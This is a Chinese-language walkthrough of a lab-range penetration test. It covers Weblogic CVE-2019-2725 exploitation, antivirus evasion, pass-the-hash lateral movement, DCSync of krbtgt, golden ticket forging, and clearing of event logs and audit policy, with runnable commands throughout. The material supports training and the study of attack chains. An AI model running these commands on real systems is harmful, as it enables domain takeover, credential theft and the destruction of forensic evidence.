红日靶场实战复盘:从Weblogic反序列化到域内横向移动的完整攻击链分析
红日靶场深度解析:从漏洞利用到内网渗透的战术思维拆解
在网络安全攻防演练中,红日靶场因其高度仿真的企业内网环境而成为渗透测试人员的"实战沙盒"。不同于单点漏洞的简单利用,真正的内网渗透考验的是攻击者如何将多个技术点串联成完整的攻击链。本文将从一个攻击者的决策视角出发,还原从Weblogic反序列化漏洞突破边界到域控完全沦陷的全过程技术细节,重点剖析每个环节的工具选择、绕过思路和战术逻辑。
1. 环境拓扑与攻击面分析
红日靶场的典型架构模拟了企业常见的DMZ区-内网隔离环境:
- WEB服务器(双网卡)
- 外网IP:192.168.44.80(暴露Weblogic服务)
- 内网IP:10.10.10.80
- PC主机(域成员)
- 外网IP:192.168.44.201
- 内网IP:10.10.10.201
- DC主机(域控制器)
- 内网IP:10.10.10.10
攻击路径的关键节点如下表所示:
| 阶段 | 目标系统 | 依赖条件 | 可能的技术手段 |
|---|---|---|---|
| 初始突破 | WEB服务器 | Weblogic漏洞暴露 | CVE-2019-2725反序列化 |
| 权限维持 | WEB服务器 | 绕过主机防护 | 内存加载Shellcode/进程注入 |
| 横向移动 | PC主机 | 445端口开放 | MS17-010/Psexec |
| 权限提升 | DC主机 | 域管理员凭证泄露 | 哈希传递/黄金票据 |
提示:实际渗透中需先通过nmap扫描确认端口开放情况,建议使用
-T4 -A -p-参数进行全端口探测和服务识别。
2. 边界突破:Weblogic反序列化漏洞实战
CVE-2019-2725是Weblogic WLS9-async组件的XML反序列化漏洞,攻击者可通过构造恶意SOAP请求实现远程代码执行。以下是关键利用步骤:
漏洞验证
curl -X POST http://192.168.44.80:7001/_async/AsyncResponseService \ -H "Content-Type: text/xml" \ --data-binary '@poc.xml'当返回500错误且包含
java.lang.Runtime等关键字时,表明存在漏洞。利用工具链选择
- 手工利用:通过ysoserial生成Payload
java -jar ysoserial.jar CommonsCollections1 "cmd /c calc.exe" > payload.ser - 自动化工具:WeblogicScan等集成化工具可快速完成漏洞检测和利用
- 手工利用:通过ysoserial生成Payload
绕过防护要点
- 静态免杀:对生成的Webshell进行代码混淆/加密
- 动态对抗:使用无文件攻击技术(如内存加载)
- 行为规避:避免直接执行高危操作(如添加用户)
实际测试中发现目标存在360动态防护,此时可采用分段执行策略:
- 第一阶段仅执行信息收集命令
- 第二阶段通过反射加载.NET程序集绕过检测
- 最终使用Cobalt Strike的
execute-assembly功能加载Mimikatz
3. 内网横向移动技术矩阵
获得WEB服务器控制权后,通过ipconfig /all发现内网网段为10.10.10.0/24。接下来需要选择合适的技术进行横向扩展:
3.1 信息收集方法论
# 基础网络信息 arp -a route print netstat -ano | findstr ESTAB # 域环境侦查 nltest /domain_trusts net group "Domain Admins" /domain dsquery computer -limit 03.2 横向技术对比
| 技术手段 | 适用场景 | 优势 | 风险点 |
|---|---|---|---|
| MS17-010 | 未打补丁的Windows系统 | 无需凭证 | 易触发IDS/可能造成系统崩溃 |
| Psexec | 已获取管理员凭证 | 稳定性高 | 日志记录明显 |
| WMI远程执行 | 防火墙放行135端口 | 隐蔽性强 | 需要高权限凭证 |
| 计划任务注入 | 存在时间差的管理窗口 | 绕过部分监控 | 需要本地管理员权限 |
在本案例中,通过以下步骤实现DC主机控制:
- 使用
crackmapexec扫描内网SMB服务:crackmapexec smb 10.10.10.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 - 发现DC主机(10.10.10.10)存在MS17-010漏洞但利用失败,转为Psexec方式:
psexec.py domain/administrator@10.10.10.10 -hashes :32ed87bdb5fdc5e9cba88547376818d4 - 获取DC控制权后提取KRBTGT账户哈希:
lsadump::dcsync /domain:de1ay.com /user:krbtgt
4. 权限维持的黄金艺术
黄金票据(Golden Ticket)攻击允许攻击者在获取KRBTGT账户哈希后,伪造任意用户的TGT票据。具体实现步骤:
获取关键信息
whoami /user # 获取当前用户SID nltest /domain # 确认域名生成黄金票据
ticketer.py -nthash b18b4b218eccad1c223306ea1916885e \ -domain-sid S-1-5-21-2543277225-3219012424-3233706247 \ -domain de1ay.com administrator票据注入
export KRB5CCNAME=administrator.ccache psexec.py de1ay.com/administrator@dc.de1ay.com -k -no-pass
关键参数说明:
- KRBTGT哈希:域控制器的"万能钥匙",默认每30天轮换一次
- 域名:必须与证书中的SPN严格匹配
- SID:去掉末尾RID部分的域SID(如S-1-5-21-...)
- 有效期:默认10小时,可通过
-duration参数延长
注意:黄金票据在域内任意主机均可使用,即使更改域管理员密码也不影响其有效性。
5. 对抗检测与痕迹清理
完整的攻击链需要覆盖"进入-驻留-离开"全生命周期。在最后阶段需重点处理:
日志清除技术对比
| 方法 | 作用范围 | 隐蔽性 | 所需权限 |
|---|---|---|---|
| wevtutil | 单个日志通道 | ★★☆ | 管理员 |
| meterpreter clearev | 三大默认日志 | ★☆☆ | SYSTEM |
| 事件查看器手动删除 | 可视化操作 | ★☆☆ | 管理员 |
| 日志策略篡改 | 阻止新日志生成 | ★★★ | 本地安全策略权限 |
推荐的多阶段清理方案:
- 先使用
wevtutil cl security清除安全日志 - 修改日志策略限制后续记录:
auditpol /set /category:"Account Logon" /success:disable /failure:disable - 最后删除Recent文件夹中的操作记录:
del /f /s /q "%appdata%\Microsoft\Windows\Recent\*"
在真实环境中,攻击者往往会采用时间延迟、流量伪装等技术进一步隐蔽行踪。例如通过DNS隧道传输数据,或使用域内合法服务(如SQL Server)作为C2通道。